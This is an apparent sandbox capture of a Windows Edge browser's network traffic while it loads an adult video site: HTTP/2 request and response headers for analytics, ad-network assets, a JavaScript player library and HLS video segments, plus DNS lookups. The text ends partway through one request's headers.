GET /events?app_id=10896&bfeatureValue=false&eventName=chromecast&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=chromecast&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://ht-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

msedge.exe

Remote address:

64.210.156.23:443

Request

GET /uploaded_content/video/002/317/221/2317221_video.mp4 HTTP/2.0
host: ht-cdn.trafficjunky.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.pornhub.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

date: Sat, 05 Oct 2024 16:04:19 GMT
content-type: video/mp4
content-length: 338573
last-modified: Fri, 23 Aug 2024 12:30:37 GMT
etag: "84455844b-52a8d-62058f1405540"
expires: Wed, 22 Jan 2025 17:13:00 GMT
cache-control: max-age=1737565980
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
content-range: bytes 0-338572/338573
x-cdn-diag: lon1-16032-3-282542-h-0-0---;16009-781-10195----0-0-0
GET

https://ht-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

msedge.exe

Remote address:

64.210.156.23:443

Request

GET /uploaded_content/video/002/317/221/2317221_video.mp4 HTTP/2.0
host: ht-cdn.trafficjunky.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.pornhub.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

date: Sat, 05 Oct 2024 16:04:19 GMT
content-type: video/mp4
content-length: 338573
last-modified: Fri, 23 Aug 2024 12:30:37 GMT
etag: "84455844b-52a8d-62058f1405540"
expires: Wed, 22 Jan 2025 17:13:00 GMT
cache-control: max-age=1737565980
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
content-range: bytes 0-338572/338573
x-cdn-diag: lon1-16032-3-282544-h-0-0---;16009-11-10195----0-0-1
GET

https://evtubescms.phncdn.com/pre_videos/002/460/721/2460721/mp4_720.mp4

msedge.exe

Remote address:

64.210.156.0:443

Request

GET /pre_videos/002/460/721/2460721/mp4_720.mp4 HTTP/2.0
host: evtubescms.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.pornhub.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

date: Sat, 05 Oct 2024 16:04:19 GMT
content-type: video/mp4
content-length: 1968293
last-modified: Wed, 28 Aug 2024 09:18:08 GMT
expires: Wed, 08 Jan 2025 02:06:23 GMT
cache-control: max-age=10767398
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
timing-allow-origin: *
accept-ranges: bytes
content-range: bytes 0-1968292/1968293
x-cdn-diag: lon1-16034-7-424686-h-0-0---;16024-780-937055----0-0-1
DNS

33.4.157.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.4.157.108.in-addr.arpa

IN PTR

Response

33.4.157.108.in-addr.arpa

IN PTR

server-108-157-4-33dus51r cloudfrontnet
DNS

195.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.212.58.216.in-addr.arpa

IN PTR

Response

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f1951e100net

195.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f3�J

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f3�J
DNS

43.223.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.223.184.93.in-addr.arpa

IN PTR

Response
DNS

23.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.156.210.64.in-addr.arpa

IN PTR

Response
DNS

62.114.254.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

62.114.254.66.in-addr.arpa

IN PTR

Response

62.114.254.66.in-addr.arpa

IN PTR

reflectededge reflectednet
DNS

0.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.156.210.64.in-addr.arpa

IN PTR

Response
DNS

www2.bing.com

Remote address:

8.8.8.8:53

Request

www2.bing.com

IN A

Response

www2.bing.com

IN CNAME

www2-www2.bing.com.trafficmanager.net

www2-www2.bing.com.trafficmanager.net

IN CNAME

www-bing-com.dual-a-0001.a-msedge.net

www-bing-com.dual-a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

www2.bing.com

Remote address:

8.8.8.8:53

Request

www2.bing.com

IN A

Response

www2.bing.com

IN CNAME

www2-www2.bing.com.trafficmanager.net

www2-www2.bing.com.trafficmanager.net

IN CNAME

www-bing-com.dual-a-0001.a-msedge.net

www-bing-com.dual-a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

13.107.21.200

dual-a-0001.a-msedge.net

IN A

204.79.197.200
DNS

pix-ht.trafficjunky.net

msedge.exe

Remote address:

8.8.8.8:53

Request

pix-ht.trafficjunky.net

IN A

Response

pix-ht.trafficjunky.net

IN CNAME

pix-ht.trafficjunky.net.sds.rncdn7.com

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.21

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.19

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.16

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.17

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.22

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.20

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.23

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.18
GET

https://pix-ht.trafficjunky.net/c3721/uploaded_content/creative/102/991/222/1/1029912221.jpg/plain/autoquality:dssim:0.004::100:0.001?validfrom=1727539457&validto=1728749057&hash=AI20WbSmA0biVXPRsNB%2BhQlYHE0%3D

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /c3721/uploaded_content/creative/102/991/222/1/1029912221.jpg/plain/autoquality:dssim:0.004::100:0.001?validfrom=1727539457&validto=1728749057&hash=AI20WbSmA0biVXPRsNB%2BhQlYHE0%3D HTTP/2.0
host: pix-ht.trafficjunky.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:19 GMT
content-type: image/webp
content-length: 51418
cache-control: max-age=31536000, public
content-disposition: inline; filename="1029912221.webp"
content-security-policy: script-src 'none'
vary: Accept, Sec-CH-DPR, DPR, Sec-CH-Width, Width
x-origin-content-length: 46752
x-origin-height: 360
x-origin-width: 640
x-request-id: 66F46D12-D812A85401BB31038F-238F09
x-result-height: 360
x-result-width: 640
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
x-cdn-diag: lon1-16008-1-119168-h-0-0---;16009-213-10195----0-0-1
GET

https://hw-cdn2.adtng.com/delivery/vortex/vortex-simple-1.0.0.js

msedge.exe

Remote address:

64.210.156.4:443

Request

GET /delivery/vortex/vortex-simple-1.0.0.js HTTP/2.0
host: hw-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://a.adtng.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:19 GMT
content-type: application/javascript
content-length: 5027
last-modified: Fri, 02 Nov 2018 14:17:11 GMT
expires: Thu, 19 Sep 2024 08:03:01 GMT
cache-control: max-age=10749385
vary: Accept-Encoding
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
x-cdn-diag: lon1-16036-2-1818582-h-0-0---;16022-109-217050----0-0-1
GET

https://hw-cdn2.adtng.com/a7/creatives/1/49/820021/1113552/1113552_logo.png

msedge.exe

Remote address:

64.210.156.4:443

Request

GET /a7/creatives/1/49/820021/1113552/1113552_logo.png HTTP/2.0
host: hw-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://a.adtng.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:19 GMT
content-type: image/png
content-length: 67079
last-modified: Tue, 13 Aug 2024 19:09:19 GMT
expires: Sat, 21 Dec 2024 01:42:23 GMT
cache-control: max-age=10644678
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
x-cdn-diag: lon1-16031-6-2928680-h-0-0---;16022-109-217050----0-0-1
GET

https://hw-cdn2.adtng.com/a7/creatives/1/49/820021/1113552/1113552_video.mp4

msedge.exe

Remote address:

64.210.156.4:443

Request

GET /a7/creatives/1/49/820021/1113552/1113552_video.mp4 HTTP/2.0
host: hw-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://a.adtng.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

date: Sat, 05 Oct 2024 16:04:22 GMT
content-type: video/mp4
content-length: 777826
last-modified: Tue, 13 Aug 2024 19:13:56 GMT
expires: Sat, 21 Dec 2024 01:42:23 GMT
cache-control: max-age=10644678
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
content-range: bytes 0-777825/777826
x-cdn-diag: lon1-16012-3-3803522-h-0-0---;16022-11-217050----0-0-1
GET

https://ei.phncdn.com/videos/202409/15/457809091/timeline/160x90/(m=eGCaiCObaaaa)(mh=_p3qeuCj3gZQt4s5)S0.jpg

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /videos/202409/15/457809091/timeline/160x90/(m=eGCaiCObaaaa)(mh=_p3qeuCj3gZQt4s5)S0.jpg HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.pornhub.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:22 GMT
content-type: image/jpeg
content-length: 138811
expires: Mon, 20 Jan 2025 19:03:22 GMT
cache-control: max-age=10763744
last-modified: Sun, 15 Sep 2024 15:51:23 GMT
etag: "26d36-6222a6d9954c0"
access-control-allow-origin: *
timing-allow-origin: *
x-cdn-diag: lon1-16032-3-282543-h-0-0---;16007-899-477085----0-0-0
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
DNS

cdn.jsdelivr.net

msedge.exe

Remote address:

8.8.8.8:53

Request

cdn.jsdelivr.net

IN A

Response

cdn.jsdelivr.net

IN CNAME

jsdelivr.map.fastly.net

jsdelivr.map.fastly.net

IN A

151.101.193.229

jsdelivr.map.fastly.net

IN A

151.101.129.229

jsdelivr.map.fastly.net

IN A

151.101.65.229

jsdelivr.map.fastly.net

IN A

151.101.1.229
GET

https://cdn.jsdelivr.net/npm/hls.js@1.5.14/dist/hls.min.js

msedge.exe

Remote address:

151.101.193.229:443

Request

GET /npm/hls.js@1.5.14/dist/hls.min.js HTTP/2.0
host: cdn.jsdelivr.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=31536000, s-maxage=31536000, immutable
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-type: application/javascript; charset=utf-8
x-jsd-version: 1.5.14
x-jsd-version-type: version
etag: W/"64e20-iugyHgLZ5BeTEOXl66BReYw1l6o"
content-encoding: br
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:04:36 GMT
age: 2255142
x-served-by: cache-fra-eddf8230071-FRA, cache-ams2100119-AMS
x-cache: HIT, HIT
vary: Accept-Encoding
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 114340
DNS

cv-h.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

cv-h.phncdn.com

IN A

Response

cv-h.phncdn.com

IN CNAME

cs851.wpc.rncdn4.com

cs851.wpc.rncdn4.com

IN A

152.195.34.118
GET

https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/master.m3u8?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

msedge.exe

Remote address:

152.195.34.118:443

Request

GET /hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/master.m3u8?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng HTTP/2.0
host: cv-h.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-headers: Server,Range,Content-Length,Content-Range
access-control-allow-methods: GET, HEAD, OPTIONS
access-control-allow-origin: https://www.pornhub.com
access-control-expose-headers: Server,Range,Content-Length,Content-Range
cache-control: max-age=7776000, stale-while-revalidate=86400, stale-if-error=86400, immutable
cache-control: no-store
content-type: application/vnd.apple.mpegurl
date: Sat, 05 Oct 2024 16:04:37 GMT
etag: "-1-a0"
server: openresty/1.17.8.2
timing-allow-origin: *
x-avs-status: MISS
content-length: 364
GET

https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/index-v1-a1.m3u8?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

msedge.exe

Remote address:

152.195.34.118:443

Request

GET /hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/index-v1-a1.m3u8?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng HTTP/2.0
host: cv-h.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-headers: Server,Range,Content-Length,Content-Range
access-control-allow-methods: GET, HEAD, OPTIONS
access-control-allow-origin: https://www.pornhub.com
access-control-expose-headers: Server,Range,Content-Length,Content-Range
cache-control: max-age=7776000, stale-while-revalidate=86400, stale-if-error=86400, immutable
cache-control: no-store
content-type: application/vnd.apple.mpegurl
date: Sat, 05 Oct 2024 16:04:37 GMT
etag: "-1-1c3c"
server: openresty/1.17.8.2
timing-allow-origin: *
x-avs-status: MISS
content-length: 53128
GET

https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-1-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

msedge.exe

Remote address:

152.195.34.118:443

Request

GET /hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-1-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng HTTP/2.0
host: cv-h.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-headers: Server,Range,Content-Length,Content-Range
access-control-allow-methods: GET, HEAD, OPTIONS
access-control-allow-origin: https://www.pornhub.com
access-control-expose-headers: Server,Range,Content-Length,Content-Range
age: 1508213
cache-control: max-age=7776000, stale-while-revalidate=86400, stale-if-error=86400, immutable
content-type: video/MP2T
date: Sat, 05 Oct 2024 16:04:37 GMT
etag: "-1-af9b8"
last-modified: Wed, 18 Sep 2024 05:07:44 GMT
server: ECAcc (amb/6B23)
timing-allow-origin: *
x-cache: HIT
content-length: 719288
GET

https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-2-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

msedge.exe

Remote address:

152.195.34.118:443

Request

GET /hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-2-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng HTTP/2.0
host: cv-h.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-headers: Server,Range,Content-Length,Content-Range
access-control-allow-methods: GET, HEAD, OPTIONS
access-control-allow-origin: https://www.pornhub.com
access-control-expose-headers: Server,Range,Content-Length,Content-Range
age: 1508214
cache-control: max-age=7776000, stale-while-revalidate=86400, stale-if-error=86400, immutable
content-type: video/MP2T
date: Sat, 05 Oct 2024 16:04:38 GMT
etag: "-1-87378"
last-modified: Wed, 18 Sep 2024 05:07:44 GMT
server: ECAcc (amb/6AF5)
timing-allow-origin: *
x-cache: HIT
x-ec-bbr-enable: 1
content-length: 553848
GET

https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-3-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

msedge.exe

Remote address:

152.195.34.118:443

Request

GET /hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-3-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng HTTP/2.0
host: cv-h.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-headers: Server,Range,Content-Length,Content-Range
access-control-allow-methods: GET, HEAD, OPTIONS
access-control-allow-origin: https://www.pornhub.com
access-control-expose-headers: Server,Range,Content-Length,Content-Range
age: 1508215
cache-control: max-age=7776000, stale-while-revalidate=86400, stale-if-error=86400, immutable
content-type: video/MP2T
date: Sat, 05 Oct 2024 16:04:39 GMT
etag: "-1-105878"
last-modified: Wed, 18 Sep 2024 05:07:44 GMT
server: ECAcc (amb/6ABB)
timing-allow-origin: *
x-cache: HIT
x-ec-bbr-enable: 1
content-length: 1071224
GET

https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-4-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

msedge.exe

Remote address:

152.195.34.118:443

Request

GET /hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-4-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng HTTP/2.0
host: cv-h.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
